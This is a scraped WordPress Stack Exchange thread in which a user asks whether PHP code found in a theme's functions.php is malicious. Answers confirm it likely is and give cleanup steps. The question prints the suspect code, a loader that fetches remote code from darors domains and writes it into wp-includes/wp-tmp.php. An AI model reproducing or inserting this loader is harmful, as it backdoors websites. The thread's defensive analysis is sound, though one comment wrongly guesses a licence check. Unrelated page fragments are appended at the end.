Is this a hacking script in function.php?2019 Community Moderator ElectionIs using eval() ok in this scenarioPrevent Hacking of Wordpress SiteWhere do hackers usually run their hacking script?Updating From Mobile App - Exposing Site to HackingLoad files contentWhy is file_get_contents returning page source?Hacked WordPress website, as notified by Google Search Console, what to do?Adding function to child theme's function.phpCan't save php string to a custom fieldHacked site. Fixed. Nailing down the cause

Is this a hacking script in function.php?

What do you call someone who asks many questions?

Is there an expression that means doing something right before you will need it rather than doing it in case you might need it?

Alternative to sending password over mail?

I would say: "You are another teacher", but she is a woman and I am a man

Avoiding the "not like other girls" trope?

Which is the best way to check return result?

What exploit Are these user agents trying to use?

How badly should I try to prevent a user from XSSing themselves?

Personal Teleportation: From Rags to Riches

iPad being using in wall mount battery swollen

If human space travel is limited by the G force vulnerability, is there a way to counter G forces?

Do scales need to be in alphabetical order?

Unlock My Phone! February 2018

Can compressed videos be decoded back to their uncompresed original format?

Should I cover my bicycle overnight while bikepacking?

Assassin's bullet with mercury

How to show a landlord what we have in savings?

How to prevent "they're falling in love" trope

Do UK voters know if their MP will be the Speaker of the House?

Why no variance term in Bayesian logistic regression?

Is "remove commented out code" correct English?

Are there any examples of a variable being normally distributed that is *not* due to the Central Limit Theorem?

CAST throwing error when run in stored procedure but not when run as raw query



Is this a hacking script in function.php?



2019 Community Moderator ElectionIs using eval() ok in this scenarioPrevent Hacking of Wordpress SiteWhere do hackers usually run their hacking script?Updating From Mobile App - Exposing Site to HackingLoad files contentWhy is file_get_contents returning page source?Hacked WordPress website, as notified by Google Search Console, what to do?Adding function to child theme's function.phpCan't save php string to a custom fieldHacked site. Fixed. Nailing down the cause










1















I have code like below in neve theme WordPress. I feel suspicious about this code



$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false)

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);







elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false )

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);






elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {









share|improve this question






















  • It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

    – ceejayoz
    4 hours ago















1















I have code like below in neve theme WordPress. I feel suspicious about this code



$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false)

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);







elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false )

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);






elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {









share|improve this question






















  • It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

    – ceejayoz
    4 hours ago













1












1








1


1






I have code like below in neve theme WordPress. I feel suspicious about this code



$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false)

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);







elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false )

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);






elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {









share|improve this question














I have code like below in neve theme WordPress. I feel suspicious about this code



$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false)

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);







elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false )

if (stripos($tmpcontent, $wp_auth_key) !== false)
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php'))
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php'))
@file_put_contents('wp-tmp.php', $tmpcontent);






elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {






php hacked






share|improve this question













share|improve this question











share|improve this question




share|improve this question










asked 6 hours ago









Latheesh V M VillaLatheesh V M Villa

3491219




3491219












  • It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

    – ceejayoz
    4 hours ago

















  • It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

    – ceejayoz
    4 hours ago
















It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

– ceejayoz
4 hours ago





It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what http://www.darors.pw/code.php contains.

– ceejayoz
4 hours ago










2 Answers
2






active

oldest

votes


















4














I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



  • changing all passwords (WP admins, FTP, hosting, database)

  • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

  • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.






share|improve this answer























  • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

    – jsmod
    5 hours ago






  • 1





    There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

    – Rick Hellewell
    4 hours ago






  • 1





    I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

    – Rick Hellewell
    4 hours ago











  • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

    – jsmod
    4 hours ago







  • 1





    Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

    – Rick Hellewell
    3 hours ago



















1














Yes, most probably yes.



It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.






share|improve this answer























  • Thanks for confirming I saw this in my client ..have to warn him about that.

    – Latheesh V M Villa
    6 hours ago











Your Answer








StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "110"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);

else
createEditor();

);

function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);



);













draft saved

draft discarded


















StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fwordpress.stackexchange.com%2fquestions%2f333380%2fis-this-a-hacking-script-in-function-php%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown

























2 Answers
2






active

oldest

votes








2 Answers
2






active

oldest

votes









active

oldest

votes






active

oldest

votes









4














I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



  • changing all passwords (WP admins, FTP, hosting, database)

  • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

  • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.






share|improve this answer























  • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

    – jsmod
    5 hours ago






  • 1





    There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

    – Rick Hellewell
    4 hours ago






  • 1





    I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

    – Rick Hellewell
    4 hours ago











  • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

    – jsmod
    4 hours ago







  • 1





    Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

    – Rick Hellewell
    3 hours ago
















4














I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



  • changing all passwords (WP admins, FTP, hosting, database)

  • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

  • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.






share|improve this answer























  • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

    – jsmod
    5 hours ago






  • 1





    There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

    – Rick Hellewell
    4 hours ago






  • 1





    I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

    – Rick Hellewell
    4 hours ago











  • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

    – jsmod
    4 hours ago







  • 1





    Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

    – Rick Hellewell
    3 hours ago














4












4








4







I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



  • changing all passwords (WP admins, FTP, hosting, database)

  • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

  • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.






share|improve this answer













I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That's not good.



So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to 'de-hack' it. Including:



  • changing all passwords (WP admins, FTP, hosting, database)

  • reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.

  • checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).

There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.







share|improve this answer












share|improve this answer



share|improve this answer










answered 6 hours ago









Rick HellewellRick Hellewell

3,91321024




3,91321024












  • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

    – jsmod
    5 hours ago






  • 1





    There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

    – Rick Hellewell
    4 hours ago






  • 1





    I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

    – Rick Hellewell
    4 hours ago











  • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

    – jsmod
    4 hours ago







  • 1





    Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

    – Rick Hellewell
    3 hours ago


















  • These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

    – jsmod
    5 hours ago






  • 1





    There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

    – Rick Hellewell
    4 hours ago






  • 1





    I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

    – Rick Hellewell
    4 hours ago











  • Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

    – jsmod
    4 hours ago







  • 1





    Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

    – Rick Hellewell
    3 hours ago

















These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

– jsmod
5 hours ago





These procedures are very useful to know, thanks for posting them. But how does code get injected into a theme's functions.php like this? Can it be prevented or is just monitoring and de-hacking the way to deal with such cases?

– jsmod
5 hours ago




1




1





There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

– Rick Hellewell
4 hours ago





There's a lot of ways that the code can get there. There have been several vulns of WP plugins lately that can allow admin access (privilege escalation) that allow for code insertion. Prevention, IMHO, is by good security practices (strong passwords everywhere - hosting, FTP, admin-level), watching the user accounts, using plugins that are kept current, keeping WP/themes/plugins updated, etc. And watching the site - looking at generated page code, looking for files that aren't supposed to be there, etc. And ensuring your dev computers are also secure and protected.

– Rick Hellewell
4 hours ago




1




1





I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

– Rick Hellewell
4 hours ago





I took the time to investigate a hack on a site that I cleaned up. That particular one used a vuln in the xmlprc.prg process. There are ways to block that particular feature in WP, which I detailed here: securitydawg.com/analyzing-a-wordpress-hack . The hack on that site was done via xmlprc.prg - I had evidence of it via the raw access logs on the server. The folks at the Internet Storm Center helped with the analysis, and suggested that was the attack vector. So all of the sites that I manage don't allow access to xmlprc.prg . But, good security practices also help.

– Rick Hellewell
4 hours ago













Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

– jsmod
4 hours ago






Thank you so much for this additional information. I really adds value :) But wouldn't blocking xmlprc also disable the WordPress mobile app?

– jsmod
4 hours ago





1




1





Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

– Rick Hellewell
3 hours ago






Probably, although I don't use the WP mobile app on any of my sites, so not an issue. There is a way to enable xmlprc on a site and still block it. Take a look here (scroll down to question 21/22): apps.wordpress.com/support/#faq-ios-gs1 . You could also add specific support to users by adjusting the code in my post to check for user accounts to allow access to xmlprc. And, the newer WP API doesn't need xmlprc, which might be a better alternative. See this article for issues: kinsta.com/blog/wordpress-xml-rpc/# . A search for xmlprc will show hacks and protections.

– Rick Hellewell
3 hours ago














1














Yes, most probably yes.



It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.






share|improve this answer























  • Thanks for confirming I saw this in my client ..have to warn him about that.

    – Latheesh V M Villa
    6 hours ago















1














Yes, most probably yes.



It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.






share|improve this answer























  • Thanks for confirming I saw this in my client ..have to warn him about that.

    – Latheesh V M Villa
    6 hours ago













1












1








1







Yes, most probably yes.



It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.






share|improve this answer













Yes, most probably yes.



It gets some code from remote server and saves it on yours. So yeah - it definitely can be harmful.







share|improve this answer












share|improve this answer



share|improve this answer










answered 6 hours ago









Krzysiek DróżdżKrzysiek Dróżdż

18.3k73248




18.3k73248












  • Thanks for confirming I saw this in my client ..have to warn him about that.

    – Latheesh V M Villa
    6 hours ago

















  • Thanks for confirming I saw this in my client ..have to warn him about that.

    – Latheesh V M Villa
    6 hours ago
















Thanks for confirming I saw this in my client ..have to warn him about that.

– Latheesh V M Villa
6 hours ago





Thanks for confirming I saw this in my client ..have to warn him about that.

– Latheesh V M Villa
6 hours ago

















draft saved

draft discarded
















































Thanks for contributing an answer to WordPress Development Stack Exchange!


  • Please be sure to answer the question. Provide details and share your research!

But avoid


  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.

To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fwordpress.stackexchange.com%2fquestions%2f333380%2fis-this-a-hacking-script-in-function-php%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown







Popular posts from this blog

How to create a command for the “strange m” symbol in latex? Announcing the arrival of Valued Associate #679: Cesar Manara Planned maintenance scheduled April 23, 2019 at 23:30 UTC (7:30pm US/Eastern)How do you make your own symbol when Detexify fails?Writing bold small caps with mathpazo packageplus-minus symbol with parenthesis around the minus signGreek character in Beamer document titleHow to create dashed right arrow over symbol?Currency symbol: Turkish LiraDouble prec as a single symbol?Plus Sign Too Big; How to Call adfbullet?Is there a TeX macro for three-legged pi?How do I get my integral-like symbol to align like the integral?How to selectively substitute a letter with another symbol representing the same letterHow do I generate a less than symbol and vertical bar that are the same height?

Българска екзархия Съдържание История | Български екзарси | Вижте също | Външни препратки | Литература | Бележки | НавигацияУстав за управлението на българската екзархия. Цариград, 1870Слово на Ловешкия митрополит Иларион при откриването на Българския народен събор в Цариград на 23. II. 1870 г.Българската правда и гръцката кривда. От С. М. (= Софийски Мелетий). Цариград, 1872Предстоятели на Българската екзархияПодмененият ВеликденИнформационна агенция „Фокус“Димитър Ризов. Българите в техните исторически, етнографически и политически граници (Атлас съдържащ 40 карти). Berlin, Königliche Hoflithographie, Hof-Buch- und -Steindruckerei Wilhelm Greve, 1917Report of the International Commission to Inquire into the Causes and Conduct of the Balkan Wars

Чепеларе Съдържание География | История | Население | Спортни и природни забележителности | Културни и исторически обекти | Религии | Обществени институции | Известни личности | Редовни събития | Галерия | Източници | Литература | Външни препратки | Навигация41°43′23.99″ с. ш. 24°41′09.99″ и. д. / 41.723333° с. ш. 24.686111° и. д.*ЧепелареЧепеларски Linux fest 2002Начало на Зимен сезон 2005/06Национални хайдушки празници „Капитан Петко Войвода“Град ЧепелареЧепеларе – народният ски курортbgrod.orgwww.terranatura.hit.bgСправка за населението на гр. Исперих, общ. Исперих, обл. РазградМузей на родопския карстМузей на спорта и скитеЧепеларебългарскибългарскианглийскитукИстория на градаСки писти в ЧепелареВремето в ЧепелареРадио и телевизия в ЧепелареЧепеларе мами с родопски чар и добри пистиЕвтин туризъм и снежни атракции в ЧепелареМестоположениеИнформация и снимки от музея на родопския карст3D панорами от ЧепелареЧепелареррр